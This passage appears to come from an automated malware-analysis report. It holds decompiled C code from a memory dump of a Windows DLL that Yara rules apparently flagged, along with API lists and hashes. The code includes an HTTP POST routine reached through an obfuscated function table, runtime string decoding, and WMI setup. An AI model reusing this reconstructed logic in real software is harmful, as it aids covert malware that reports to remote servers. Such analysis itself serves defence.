                                    								}
                                    								if(__eflags == 0) {
                                    									__eflags = _v72 - 0xffff;
                                    									_t298 = L"TRUE";
                                    									if(_v72 != 0xffff) {
                                    										_t298 = L"FALSE";
                                    									}
                                    									goto L31;
                                    								}
                                    								_t243 = _t218 - 1;
                                    								__eflags = _t243;
                                    								if(_t243 == 0) {
                                    									goto L38;
                                    								}
                                    								_t244 = _t243 - 1;
                                    								__eflags = _t244;
                                    								if(_t244 == 0) {
                                    									goto L35;
                                    								}
                                    								_t245 = _t244 - 1;
                                    								__eflags = _t245;
                                    								if(_t245 == 0) {
                                    									goto L35;
                                    								}
                                    								__eflags = _t245 != 5;
                                    								if(_t245 != 5) {
                                    									goto L28;
                                    								}
                                    								_t298 = _v72;
                                    								goto L31;
                                    							}
                                    							__imp__#16(_v24);
                                    							_t210 = _v28;
                                    							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                    							_t252 = _v20;
                                    							L42:
                                    							_t262 = _v32;
                                    							_t252 = _t252 + 1;
                                    							_v20 = _t252;
                                    							__eflags = _t262;
                                    							if(_t262 != 0) {
                                    								continue;
                                    							}
                                    							L48:
                                    							_t324 = _v40;
                                    							goto L49;
                                    						}
                                    						_t247 = _v28;
                                    						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                    						goto L42;
                                    					}
                                    					_t262 = _v32;
                                    					goto L48;
                                    				} else {
                                    					E1000861A( &_v36, _t322);
                                    					_t320 = _v36;
                                    					goto L53;
                                    				}
                                    			}
                                    0x1000df2d
                                    0x1000dcf9
                                    0x1000ded0
                                    0x1000ded0
                                    0x1000ded3
                                    0x1000ded6
                                    0x00000000
                                    0x00000000
                                    0x1000dd01
                                    0x1000dd09
                                    0x1000dd10
                                    0x1000dd16
                                    0x1000dd18
                                    0x00000000
                                    0x00000000
                                    0x1000dd21
                                    0x1000dd36
                                    0x1000dd3c
                                    0x1000dd45
                                    0x1000dd48
                                    0x1000dd4b
                                    0x1000dd4d
                                    0x1000dec3
                                    0x1000dec6
                                    0x1000decf
                                    0x1000decf
                                    0x00000000
                                    0x1000decf
                                    0x1000dd5d
                                    0x1000dd60
                                    0x1000dd67
                                    0x1000dd6d
                                    0x1000dd70
                                    0x1000dd73
                                    0x1000dd76
                                    0x1000dd79
                                    0x1000ddb5
                                    0x1000ddb5
                                    0x1000ddb8
                                    0x1000de64
                                    0x1000de78
                                    0x1000de88
                                    0x1000de8c
                                    0x1000de8e
                                    0x1000dea5
                                    0x1000dea9
                                    0x1000deb2
                                    0x1000debd
                                    0x00000000
                                    0x1000debd
                                    0x1000de94
                                    0x1000de95
                                    0x1000de9a
                                    0x1000de9a
                                    0x1000de9c
                                    0x1000de9d
                                    0x1000dea2
                                    0x00000000
                                    0x1000dea2
                                    0x1000ddbe
                                    0x1000ddbe
                                    0x1000ddc1
                                    0x1000de2c
                                    0x1000de40
                                    0x1000de50
                                    0x1000de54
                                    0x1000de56
                                    0x00000000
                                    0x00000000
                                    0x1000de5c
                                    0x1000de5d
                                    0x00000000
                                    0x1000de5d
                                    0x1000ddc3
                                    0x1000ddc3
                                    0x1000ddc6
                                    0x00000000
                                    0x00000000
                                    0x1000ddc8
                                    0x1000ddcb
                                    0x00000000
                                    0x00000000
                                    0x1000ddcd
                                    0x1000ddcd
                                    0x1000ddd3
                                    0x1000ddef
                                    0x1000ddfe
                                    0x1000de07
                                    0x1000de0c
                                    0x1000de0f
                                    0x1000de15
                                    0x1000de15
                                    0x1000de1a
                                    0x1000de26
                                    0x00000000
                                    0x1000de26
                                    0x1000ddd8
                                    0x00000000
                                    0x1000ddd8
                                    0x1000dd7b
                                    0x1000dda2
                                    0x1000dda7
                                    0x1000ddac
                                    0x1000ddae
                                    0x1000ddae
                                    0x00000000
                                    0x1000ddac
                                    0x1000dd7d
                                    0x1000dd7d
                                    0x1000dd80
                                    0x00000000
                                    0x00000000
                                    0x1000dd86
                                    0x1000dd86
                                    0x1000dd89
                                    0x00000000
                                    0x00000000
                                    0x1000dd8f
                                    0x1000dd8f
                                    0x1000dd92
                                    0x00000000
                                    0x00000000
                                    0x1000dd98
                                    0x1000dd9b
                                    0x00000000
                                    0x00000000
                                    0x1000dd9d
                                    0x00000000
                                    0x1000dd9d
                                    0x1000dedf
                                    0x1000dee5
                                    0x1000deeb
                                    0x1000deee
                                    0x1000def1
                                    0x1000def1
                                    0x1000def4
                                    0x1000def5
                                    0x1000def8
                                    0x1000defa
                                    0x00000000
                                    0x00000000
                                    0x1000df4a
                                    0x1000df4a
                                    0x00000000
                                    0x1000df4a
                                    0x1000dc81
                                    0x1000dc87
                                    0x00000000
                                    0x1000dc87
                                    0x1000df47
                                    0x00000000
                                    0x1000dbca
                                    0x1000dbcf
                                    0x1000dbd4
                                    0x00000000
                                    0x1000dbd8

                                    APIs
                                      • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                      • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                      • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                      • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                      • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                                    • SysFreeString.OLEAUT32(?), ref: 1000DF82
                                    • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                                      • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                                    • String ID: FALSE$TRUE
                                    • API String ID: 224402418-1412513891
                                    • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                    • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                                    • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                    • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                    				char _v8;
                                    				char _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				int _v76;
                                    				void* _v80;
                                    				intOrPtr _v100;
                                    				int _v104;
                                    				void* _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char* _v120;
                                    				void _v124;
                                    				char _v140;
                                    				void _v396;
                                    				void _v652;
                                    				intOrPtr _t105;
                                    				intOrPtr _t113;
                                    				intOrPtr* _t115;
                                    				intOrPtr _t118;
                                    				intOrPtr _t121;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t131;
                                    				char _t133;
                                    				intOrPtr _t136;
                                    				char _t138;
                                    				char _t139;
                                    				intOrPtr _t141;
                                    				intOrPtr _t147;
                                    				intOrPtr _t154;
                                    				intOrPtr _t158;
                                    				intOrPtr _t162;
                                    				intOrPtr _t164;
                                    				intOrPtr _t166;
                                    				intOrPtr _t172;
                                    				intOrPtr _t176;
                                    				void* _t183;
                                    				void* _t185;
                                    				intOrPtr _t186;
                                    				char _t195;
                                    				intOrPtr _t203;
                                    				intOrPtr _t204;
                                    				signed int _t209;
                                    				void _t212;
                                    				intOrPtr _t213;
                                    				void* _t214;
                                    				intOrPtr _t216;
                                    				char _t217;
                                    				intOrPtr _t218;
                                    				signed int _t219;
                                    				signed int _t220;
                                    				void* _t221;
                                    
                                    				_v40 = _v40 & 0x00000000;
                                    				_v24 = 4;
                                    				_v36 = 1;
                                    				_t214 = __edx;
                                    				memset( &_v396, 0, 0x100);
                                    				memset( &_v652, 0, 0x100);
                                    				_v64 = E100095C7(0x85b);
                                    				_v60 = E100095C7(0xdc9);
                                    				_v56 = E100095C7(0x65d);
                                    				_v52 = E100095C7(0xdd3);
                                    				_t105 = E100095C7(0xb74);
                                    				_v44 = _v44 & 0;
                                    				_t212 = 0x3c;
                                    				_v48 = _t105;
                                    				memset( &_v124, 0, 0x100);
                                    				_v116 = 0x10;
                                    				_v120 =  &_v140;
                                    				_v124 = _t212;
                                    				_v108 =  &_v396;
                                    				_v104 = 0x100;
                                    				_v80 =  &_v652;
                                    				_push( &_v124);
                                    				_push(0);
                                    				_v76 = 0x100;
                                    				_push(E1000C379(_t214));
                                    				_t113 =  *0x1001e6a4; // 0x0
                                    				_push(_t214);
                                    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                    					_t209 = 0;
                                    					_v20 = 0;
                                    					do {
                                    						_t115 =  *0x1001e6a4; // 0x0
                                    						_v12 = 0x8404f700;
                                    						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                    						if(_t213 != 0) {
                                    							_t195 = 3;
                                    							_t185 = 4;
                                    							_v8 = _t195;
                                    							_t118 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                    							_v8 = 0x3a98;
                                    							_t121 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t124 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t127 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                    							_t131 =  *0x1001e6a4; // 0x0
                                    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                    							if(_a24 != 0) {
                                    								E1000980C(_a24);
                                    							}
                                    							if(_t186 != 0) {
                                    								_t133 = 0x8484f700;
                                    								if(_v112 != 4) {
                                    									_t133 = _v12;
                                    								}
                                    								_t136 =  *0x1001e6a4; // 0x0
                                    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                    								_v8 = _t216;
                                    								if(_a24 != 0) {
                                    									E1000980C(_a24);
                                    								}
                                    								if(_t216 != 0) {
                                    									_t138 = 4;
                                    									if(_v112 != _t138) {
                                    										L19:
                                    										_t139 = E100095C7(0x777);
                                    										_t217 = _t139;
                                    										_v12 = _t217;
                                    										_t141 =  *0x1001e6a4; // 0x0
                                    										_t218 = _v8;
                                    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                                    										E100085C2( &_v12);
                                    										if(_a24 != 0) {
                                    											E1000980C(_a24);
                                    										}
                                    										if(_v28 != 0) {
                                    											L28:
                                    											_v24 = 8;
                                    											_push(0);
                                    											_v32 = 0;
                                    											_v28 = 0;
                                    											_push( &_v24);
                                    											_push( &_v32);
                                    											_t147 =  *0x1001e6a4; // 0x0
                                    											_push(0x13);
                                    											_push(_t218);
                                    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                    												_t219 = E10009749( &_v32);
                                    												if(_t219 == 0xc8) {
                                    													 *_a20 = _v8;
                                    													 *_a12 = _t213;
                                    													 *_a16 = _t186;
                                    													return 0;
                                    												}
                                    												_t220 =  ~_t219;
                                    												L32:
                                    												_t154 =  *0x1001e6a4; // 0x0
                                    												 *((intOrPtr*)(_t154 + 8))(_v8);
                                    												L33:
                                    												if(_t186 != 0) {
                                    													_t158 =  *0x1001e6a4; // 0x0
                                    													 *((intOrPtr*)(_t158 + 8))(_t186);
                                    												}
                                    												if(_t213 != 0) {
                                    													_t203 =  *0x1001e6a4; // 0x0
                                    													 *((intOrPtr*)(_t203 + 8))(_t213);
                                    												}
                                    												return _t220;
                                    											}
                                    											GetLastError();
                                    											_t220 = 0xfffffff8;
                                    											goto L32;
                                    										} else {
                                    											GetLastError();
                                    											_t162 =  *0x1001e6a4; // 0x0
                                    											 *((intOrPtr*)(_t162 + 8))(_t218);
                                    											_t218 = 0;
                                    											goto L23;
                                    										}
                                    									}
                                    									_v12 = _t138;
                                    									_push( &_v12);
                                    									_push( &_v16);
                                    									_t172 =  *0x1001e6a4; // 0x0
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                    										L18:
                                    										GetLastError();
                                    										goto L19;
                                    									}
                                    									_v16 = _v16 | 0x00003380;
                                    									_push(4);
                                    									_push( &_v16);
                                    									_t176 =  *0x1001e6a4; // 0x0
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                    										goto L19;
                                    									}
                                    									goto L18;
                                    								} else {
                                    									GetLastError();
                                    									L23:
                                    									_t164 =  *0x1001e6a4; // 0x0
                                    									 *((intOrPtr*)(_t164 + 8))(_t186);
                                    									_t186 = 0;
                                    									goto L24;
                                    								}
                                    							} else {
                                    								GetLastError();
                                    								L24:
                                    								_t166 =  *0x1001e6a4; // 0x0
                                    								 *((intOrPtr*)(_t166 + 8))(_t213);
                                    								_t213 = 0;
                                    								goto L25;
                                    							}
                                    						}
                                    						GetLastError();
                                    						L25:
                                    						_t204 = _t218;
                                    						_t209 = _v20 + 1;
                                    						_v20 = _t209;
                                    					} while (_t209 < 2);
                                    					_v8 = _t218;
                                    					if(_t204 != 0) {
                                    						goto L28;
                                    					}
                                    					_t220 = 0xfffffffe;
                                    					goto L33;
                                    				}
                                    				_t183 = 0xfffffffc;
                                    				return _t183;
                                    			}

                                    0x1000e914
                                    0x1000e914
                                    0x1000e91a
                                    0x1000e91d
                                    0x00000000
                                    0x1000e91d
                                    0x1000e81c
                                    0x1000e81c
                                    0x1000e91f
                                    0x1000e91f
                                    0x1000e925
                                    0x1000e928
                                    0x00000000
                                    0x1000e928
                                    0x1000e81a
                                    0x1000e785
                                    0x1000e92a
                                    0x1000e92d
                                    0x1000e92f
                                    0x1000e932
                                    0x1000e935
                                    0x1000e93e
                                    0x1000e943
                                    0x00000000
                                    0x00000000
                                    0x1000e947
                                    0x00000000
                                    0x1000e947
                                    0x1000e754
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: memset$ErrorLast
                                    • String ID: POST
                                    • API String ID: 2570506013-1814004025
                                    • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                    • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                                    • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                    • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E100116B8(signed int* _a4) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				_Unknown_base(*)()* _v16;
                                    				char _v20;
                                    				_Unknown_base(*)()* _t16;
                                    				_Unknown_base(*)()* _t17;
                                    				void* _t22;
                                    				intOrPtr* _t28;
                                    				signed int _t29;
                                    				signed int _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t34;
                                    
                                    				_t30 = 0;
                                    				_v8 = 0;
                                    				_t32 = GetModuleHandleA("advapi32.dll");
                                    				if(_t32 == 0) {
                                    					L9:
                                    					return 1;
                                    				}
                                    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                    				_v12 = _t16;
                                    				if(_t16 == 0) {
                                    					goto L9;
                                    				}
                                    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                    				_v16 = _t17;
                                    				if(_t17 == 0) {
                                    					goto L9;
                                    				}
                                    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                    				if(_t28 == 0) {
                                    					goto L9;
                                    				}
                                    				_push(0xf0000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v8);
                                    				if(_v12() == 0) {
                                    					goto L9;
                                    				}
                                    				_t22 = _v16(_v8, 4,  &_v20);
                                    				 *_t28(_v8, 0);
                                    				if(_t22 == 0) {
                                    					goto L9;
                                    				}
                                    				_t29 = 0;
                                    				do {
                                    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                    					_t29 = _t29 + 1;
                                    				} while (_t29 < 4);
                                    				 *_a4 = _t30;
                                    				return 0;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                    • API String ID: 667068680-129414566
                                    • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                    • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                                    • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                    • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                    				signed int _t12;
                                    				signed int _t13;
                                    				int _t15;
                                    				char* _t24;
                                    				char* _t26;
                                    				char* _t28;
                                    				char* _t29;
                                    				signed int _t40;
                                    				char* _t43;
                                    				char* _t45;
                                    				long long* _t47;
                                    
                                    				_t12 = _a20;
                                    				if(_t12 == 0) {
                                    					_t12 = 0x11;
                                    				}
                                    				_t26 = _a4;
                                    				_push(_t30);
                                    				 *_t47 = _a12;
                                    				_push(_t12);
                                    				_push("%.*g");
                                    				_push(_a8);
                                    				_push(_t26);
                                    				L10012285();
                                    				_t40 = _t12;
                                    				if(_t40 < 0 || _t40 >= _a8) {
                                    					L19:
                                    					_t13 = _t12 | 0xffffffff;
                                    					goto L20;
                                    				} else {
                                    					L100122CD();
                                    					_t15 =  *((intOrPtr*)( *_t12));
                                    					if(_t15 != 0x2e) {
                                    						_t24 = strchr(_t26, _t15);
                                    						if(_t24 != 0) {
                                    							 *_t24 = 0x2e;
                                    						}
                                    					}
                                    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                    						L11:
                                    						_t43 = strchr(_t26, 0x65);
                                    						_t28 = _t43;
                                    						if(_t43 == 0) {
                                    							L18:
                                    							_t13 = _t40;
                                    							L20:
                                    							return _t13;
                                    						}
                                    						_t45 = _t43 + 1;
                                    						_t29 = _t28 + 2;
                                    						if( *_t45 == 0x2d) {
                                    							_t45 = _t29;
                                    						}
                                    						while( *_t29 == 0x30) {
                                    							_t29 = _t29 + 1;
                                    						}
                                    						if(_t29 != _t45) {
                                    							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                                    							_t40 = _t40 + _t45 - _t29;
                                    						}
                                    						goto L18;
                                    					} else {
                                    						_t6 = _t40 + 3; // 0x100109b2
                                    						_t12 = _t6;
                                    						if(_t12 >= _a8) {
                                    							goto L19;
                                    						}
                                    						_t26[_t40] = 0x302e;
                                    						( &(_t26[2]))[_t40] = 0;
                                    						_t40 = _t40 + 2;
                                    						goto L11;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: strchr$_snprintflocaleconv
                                    • String ID: %.*g
                                    • API String ID: 1910550357-952554281
                                    • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                    • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                                    • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                    • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _snprintfqsort
                                    • String ID: %I64d$false$null$true
                                    • API String ID: 756996078-4285102228
                                    • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                    • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                                    • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                    • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                    				char _v516;
                                    				void _v1044;
                                    				char _v1076;
                                    				signed int _v1080;
                                    				signed int _v1096;
                                    				WCHAR* _v1100;
                                    				intOrPtr _v1104;
                                    				signed int _v1108;
                                    				intOrPtr _v1112;
                                    				intOrPtr _v1116;
                                    				char _v1144;
                                    				char _v1148;
                                    				void* __esi;
                                    				intOrPtr _t66;
                                    				intOrPtr _t73;
                                    				signed int _t75;
                                    				intOrPtr _t76;
                                    				signed int _t81;
                                    				WCHAR* _t87;
                                    				void* _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				WCHAR* _t96;
                                    				intOrPtr _t106;
                                    				intOrPtr _t107;
                                    				void* _t108;
                                    				intOrPtr _t109;
                                    				signed char _t116;
                                    				WCHAR* _t118;
                                    				void* _t122;
                                    				signed int _t123;
                                    				intOrPtr _t125;
                                    				void* _t128;
                                    				void* _t129;
                                    				WCHAR* _t130;
                                    				void* _t134;
                                    				void* _t141;
                                    				void* _t143;
                                    				WCHAR* _t145;
                                    				signed int _t153;
                                    				void* _t154;
                                    				void* _t178;
                                    				signed int _t180;
                                    				void* _t181;
                                    				void* _t183;
                                    				void* _t187;
                                    				signed int _t188;
                                    				WCHAR* _t190;
                                    				signed int _t191;
                                    				signed int _t192;
                                    				intOrPtr* _t194;
                                    				signed int _t196;
                                    				void* _t199;
                                    				void* _t200;
                                    				void* _t201;
                                    				void* _t202;
                                    				intOrPtr* _t203;
                                    				void* _t208;
                                    
                                    				_t208 = __fp0;
                                    				_push(_t191);
                                    				_t128 = __edx;
                                    				_t187 = __ecx;
                                    				_t192 = _t191 | 0xffffffff;
                                    				memset( &_v1044, 0, 0x20c);
                                    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                    				_v1108 = 1;
                                    				if(_t187 != 0) {
                                    					_t123 =  *0x1001e688; // 0x7900590
                                    					_t125 =  *0x1001e68c; // 0x797fc68
                                    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                    				}
                                    				if(E1000BB8D(_t187) != 0) {
                                    					L4:
                                    					_t134 = _t128;
                                    					_t66 = E1000B7A8(_t134,  &_v516);
                                    					_push(_t134);
                                    					_v1104 = _t66;
                                    					E1000B67D(_t66,  &_v1076, _t206, _t208);
                                    					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                                    					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                                    					E1000B88A(_t141,  &_v1100, _t208);
                                    					_t175 =  &_v1076;
                                    					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                                    					_v1112 = _t73;
                                    					_t143 = _t141;
                                    					if(_t73 != 0) {
                                    						_push(0);
                                    						_push(_t129);
                                    						_push("\\");
                                    						_t130 = E100092E5(_t73);
                                    						_t200 = _t199 + 0x10;
                                    						_t75 =  *0x1001e688; // 0x7900590
                                    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                    							L12:
                                    							__eflags = _v1108;
                                    							if(__eflags != 0) {
                                    								_t76 = E100091E3(_v1112);
                                    								_t145 = _t130;
                                    								 *0x1001e740 = _t76;
                                    								 *0x1001e738 = E100091E3(_t145);
                                    								L17:
                                    								_push(_t145);
                                    								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                                    								_t201 = _t200 + 0x10;
                                    								__eflags = _t188;
                                    								if(_t188 == 0) {
                                    									goto L41;
                                    								}
                                    								_push(0x1001b9ca);
                                    								E10009F48(0xe);
                                    								E10009F6C(_t188, _t208, _t130);
                                    								_t194 = _a4;
                                    								_v1096 = _v1096 & 0x00000000;
                                    								_push(2);
                                    								_v1100 =  *_t194;
                                    								_push(8);
                                    								_push( &_v1100);
                                    								_t178 = 0xb;
                                    								E1000A0AB(_t188, _t178, _t208);
                                    								_t179 =  *(_t194 + 0x10);
                                    								_t202 = _t201 + 0xc;
                                    								__eflags =  *(_t194 + 0x10);
                                    								if( *(_t194 + 0x10) != 0) {
                                    									E1000A3ED(_t188, _t179, _t208);
                                    								}
                                    								_t180 =  *(_t194 + 0xc);
                                    								__eflags = _t180;
                                    								if(_t180 != 0) {
                                    									E1000A3ED(_t188, _t180, _t208);
                                    								}
                                    								_t87 = E1000980C(0);
                                    								_push(2);
                                    								_v1100 = _t87;
                                    								_t153 = _t188;
                                    								_push(8);
                                    								_v1096 = _t180;
                                    								_push( &_v1100);
                                    								_t181 = 2;
                                    								_t89 = E1000A0AB(_t153, _t181, _t208);
                                    								_t203 = _t202 + 0xc;
                                    								__eflags = _v1108;
                                    								if(_v1108 == 0) {
                                    									_t153 =  *0x1001e688; // 0x7900590
                                    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                                    										_t203 = _t203 + 0xc;
                                    										goto L26;
                                    									}
                                    									_t153 = _t153 + 0x228;
                                    									goto L25;
                                    								} else {
                                    									_t91 =  *0x1001e688; // 0x7900590
                                    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										L32:
                                    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                    											_t183 = 0x64;
                                    											E1000E23E(_t183);
                                    										}
                                    										E100052C0( &_v1076, _t208);
                                    										_t190 = _a8;
                                    										_t154 = _t153;
                                    										__eflags = _t190;
                                    										if(_t190 != 0) {
                                    											_t94 =  *0x1001e688; // 0x7900590
                                    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                    												lstrcpyW(_t190, _t130);
                                    											} else {
                                    												_t96 = E1000109A(_t154, 0x228);
                                    												_v1100 = _t96;
                                    												lstrcpyW(_t190, _t96);
                                    												E100085D5( &_v1100);
                                    												 *_t203 = "\"";
                                    												lstrcatW(_t190, ??);
                                    												lstrcatW(_t190, _t130);
                                    												lstrcatW(_t190, "\"");
